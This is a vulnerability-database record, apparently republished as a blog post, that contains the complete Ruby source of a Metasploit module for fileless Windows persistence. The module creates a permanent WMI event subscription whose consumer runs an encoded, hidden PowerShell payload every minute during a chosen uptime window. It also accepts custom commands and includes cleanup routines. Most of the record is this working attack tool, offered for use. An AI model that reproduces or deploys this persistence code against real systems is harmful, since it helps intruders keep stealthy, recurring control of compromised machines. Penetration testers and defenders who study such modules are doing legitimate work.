{“lastseen”:”2026-01-14T19:32:09″,”description”:”This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time…”,”published”:”2026-01-14T18:54:18″,”modified”:”2026-01-14T18:54:18″,”type”:”metasploit”,”title”:”WMI Event Subscription Logon Timer Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-WMI-WMI_EVENT_SUBSCRIPTION_UPTIME-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = NormalRanking\\n\\n include Msf::Post::Windows::Powershell\\n include Msf::Exploit::Powershell\\n include Post::Windows::Priv\\n include Msf::Post::File\\n include Msf::Exploit::Local::Persistence\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/windows\/local\/wmi_persistence’ # previously the \\”LOGON\\” wmi_persistence method\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘WMI Event Subscription Logon Timer Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that\\n will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time.\\n\\n Additionally a custom command can be specified to run once the trigger is\\n activated using the advanced option CustomPsCommand. This module requires administrator level privileges as well as a\\n high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.\\n },\\n ‘Author’ =\\u003e [\\n ‘Nick Tyrer \\u003c@NickTyrer\\u003e’, # original module\\n ‘h00die’ # docs, persistence mixin, pshell cleanup\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Privileged’ =\\u003e true,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘SessionTypes’ =\\u003e [‘meterpreter’],\\n ‘Targets’ =\\u003e [[‘Windows’, {}]],\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_X86, ARCH_AARCH64],\\n ‘DisclosureDate’ =\\u003e ‘2017-06-06’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf’],\\n [‘URL’, ‘https:\/\/learn-powershell.net\/2013\/08\/14\/powershell-and-events-permanent-wmi-event-subscriptions\/’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [EVENT_DEPENDENT, REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [CONFIG_CHANGES, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘CLASSNAME’,\\n [true, ‘WMI event class name. (Default: UPDATER)’, ‘UPDATER’ ]),\\n OptInt.new(‘SYSTEM_UPTIME_START’, [true, ‘System uptime to start the trigger (In seconds). (Default: 240).’, 240 ]), # 4min\\n OptInt.new(‘SYSTEM_UPTIME_END’, [true, ‘System uptime to end the trigger (In seconds). (Default: 325).’, 325 ]), # 5min 25sec\\n ])\\n\\n register_advanced_options(\\n [\\n OptString.new(‘CustomPsCommand’,\\n [false, ‘Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)’, false, ]),\\n ]\\n )\\n\\n deregister_options(‘WritableDir’)\\n end\\n\\n def check\\n return CheckCode::Safe(‘This module requires powershell to run’) unless have_powershell?\\n\\n return CheckCode::Safe(‘This module requires admin privs to run’) unless is_admin?\\n\\n return CheckCode::Safe(‘This module cannot run as System’) if is_system?\\n\\n return CheckCode::Safe(‘This module requires UAC to be bypassed first’) unless is_high_integrity?\\n\\n uptime = windows_uptime\\n vprint_status(\\”System uptime: #{uptime}s\\”)\\n return CheckCode::Safe(\\”SYSTEM_UPTIME_START (#{datastore[‘SYSTEM_UPTIME_START’]}) is less than the current system uptime: #{uptime}\\”) if uptime \\u003e datastore[‘SYSTEM_UPTIME_START’]\\n return CheckCode::Safe(\\”SYSTEM_UPTIME_START (#{datastore[‘SYSTEM_UPTIME_START’]}) must be less than SYSTEM_UPTIME_END: #{datastore[‘SYSTEM_UPTIME_END’]}\\”) if datastore[‘SYSTEM_UPTIME_START’] \\u003e datastore[‘SYSTEM_UPTIME_END’]\\n\\n CheckCode::Appears(‘Likely exploitable’)\\n end\\n\\n def windows_uptime\\n # Run PowerShell to get boot time in WMI format\\n boot_time_str = cmd_exec(‘powershell -Command \\”(gcim Win32_OperatingSystem).LastBootUpTime | Out-String\\”‘).strip\\n\\n # Try to parse PowerShell localized format (e.g. \\”Thursday, November 20, 2025 7:45:59 PM\\”)\\n begin\\n boot_time = Time.parse(boot_time_str)\\n rescue ArgumentError\\n # Fallback: try WMI format like \\”20251120194559.500000-300\\”\\n if boot_time_str =~ \/^(\\\\d{4})(\\\\d{2})(\\\\d{2})(\\\\d{2})(\\\\d{2})(\\\\d{2})\\\\.\\\\d+\\\\s*([+-]\\\\d{3})?\/\\n year = ::Regexp.last_match(1)\\n month = ::Regexp.last_match(2)\\n day = ::Regexp.last_match(3)\\n hour = ::Regexp.last_match(4)\\n min = ::Regexp.last_match(5)\\n sec = ::Regexp.last_match(6)\\n tz_offset = ::Regexp.last_match(7)\\n offset_hours = (tz_offset.to_i \/ 60)\\n offset = format(‘%+03d:00’, offset_hours)\\n boot_time = Time.new(year, month, day, hour, min, sec, offset)\\n else\\n vprint_error(\\”Unable to parse boot time: #{boot_time_str.inspect}\\”)\\n return 0\\n end\\n end\\n\\n (Time.now – boot_time).round\\n end\\n\\n def install_persistence\\n print_status(‘Installing Persistence…’)\\n\\n psh_exec(subscription_logon)\\n print_good ‘Persistence installed!’\\n # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell\\n # source https:\/\/support.microsoft.com\/en-us\/topic\/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d\\n # @clean_up_rc \\u003c\\u003c \\”execute -H -f wmic -a \\\\\\”\/NAMESPACE:\\\\\\\\\\\\\\”\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\\\\\\\\\\\\\” PATH __EventFilter WHERE Name=\\\\\\\\\\\\\\”#{name_class}\\\\\\\\\\\\\\” DELETE\\\\\\”\\\\n\\”\\n # @clean_up_rc \\u003c\\u003c \\”execute -H -f wmic -a \\\\\\”\/NAMESPACE:\\\\\\\\\\\\\\”\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\\\\\\\\\\\\\” PATH CommandLineEventConsumer WHERE Name=\\\\\\\\\\\\\\”#{name_class}\\\\\\\\\\\\\\” DELETE\\\\\\”\\\\n\\”\\n # @clean_up_rc \\u003c\\u003c \\”execute -H -f wmic -a \\\\\\”\/NAMESPACE:\\\\\\\\\\\\\\”\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\\\\\\\\\\\\\” PATH __FilterToConsumerBinding WHERE Filter=’__EventFilter.Name=\\\\\\\\\\\\\\”#{name_class}\\\\\\\\\\\\\\”‘ DELETE\\\\\\”\\”\\n name_class = datastore[‘CLASSNAME’]\\n @clean_up_rc \\u003c\\u003c %(execute -H -f powershell -a \\”-Command \\\\\\\\\\\\\\”Get-CimInstance -Namespace root\/subscription -ClassName __EventFilter | Where-Object { $_.Name -eq ‘#{name_class}’ } | ForEach-Object { Remove-CimInstance -InputObject $_ }\\\\\\\\\\\\\\”\\”\\\\n)\\n @clean_up_rc \\u003c\\u003c %(execute -H -f powershell -a \\”-Command \\\\\\\\\\\\\\”Get-CimInstance -Namespace root\/subscription -ClassName CommandLineEventConsumer | Where-Object { $_.Name -eq ‘#{name_class}’ } | ForEach-Object { Remove-CimInstance -InputObject $_ }\\\\\\\\\\\\\\”\\”\\\\n)\\n @clean_up_rc \\u003c\\u003c %(execute -H -f powershell -a \\”-Command \\\\\\\\\\\\\\”Get-CimInstance -Namespace root\/subscription -ClassName __FilterToConsumerBinding WHERE Filter=’__EventFilter.Name=\\\\\\\\\\\\\\”#{name_class}’ } | ForEach-Object { Remove-CimInstance -InputObject $_ }\\\\\\\\\\\\\\”\\”\\\\n)\\n end\\n\\n def build_payload\\n if datastore[‘CustomPsCommand’]\\n script_in = datastore[‘CustomPsCommand’]\\n compressed_script = compress_script(script_in)\\n encoded_script = encode_script(compressed_script)\\n generate_psh_command_line(noprofile: true, windowstyle: ‘hidden’, encodedcommand: encoded_script)\\n else\\n cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\\n end\\n end\\n\\n def subscription_logon\\n command = build_payload\\n class_name = datastore[‘CLASSNAME’]\\n \\u003c\\u003c-HEREDOC\\n $Filter = Set-WmiInstance -Namespace root\/subscription -Class __EventFilter -Arguments @{EventNamespace = ‘root\/cimv2’; Name = \\\\\\”#{class_name}\\\\\\”; Query = \\\\\\”SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ‘Win32_PerfFormattedData_PerfOS_System’ AND TargetInstance.SystemUpTime \\u003e= #{datastore[‘SYSTEM_UPTIME_START’]} AND TargetInstance.SystemUpTime \\u003c #{datastore[‘SYSTEM_UPTIME_END’]}\\\\\\”; QueryLanguage = ‘WQL’}\\n $Consumer = Set-WmiInstance -Namespace root\/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\\\\”#{class_name}\\\\\\”; CommandLineTemplate = \\\\\\”#{command}\\\\\\”}\\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root\/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\\n HEREDOC\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/wmi\/wmi_event_subscription_uptime.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/wmi\/wmi_event_subscription_uptime\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-14T19:32:09″,”description”:”This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that will trigger the payload after the system…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-35727","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n